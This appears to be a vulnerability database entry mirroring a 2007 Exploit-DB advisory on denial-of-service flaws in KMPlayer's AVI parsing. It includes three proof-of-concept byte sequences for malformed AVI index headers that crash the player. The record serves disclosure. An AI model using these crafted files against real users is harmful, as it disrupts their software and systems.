Denial-of-Service Vulnerabilities in KMPlayer

vendor:

KMPlayer

by:

Unknown

7.5

CVSS

HIGH

Denial-of-Service

400

CWE

Product Name: KMPlayer

Affected Version From: 2.9.3.1210

Affected Version To:

Patch Exists: NO

Related CWE:

CPE: a:kmplayer:kmplayer:2.9.3.1210

Metasploit:

Other Scripts:

Platforms Tested: Windows

2007

Denial-of-Service Vulnerabilities in KMPlayer

KMPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed AVI media files. Successfully exploiting this issue allows remote attackers to deny service to legitimate users.

Mitigation:

Update KMPlayer to a patched version or avoid opening AVI media files from untrusted sources.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25651/info

KMPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed AVI media files.

Successfully exploiting this issue allows remote attackers to deny service to legitimate users.

These issues affect KMPlayer 2.9.3.1210; other versions may also be vulnerable. 

new_avihead_poc1.avi
------------------------------------------
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10

indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

new_avihead_poc2.avi
------------------------------------------
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF

indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF

new_avihead_poc3.avi
------------------------------------------
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10

indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020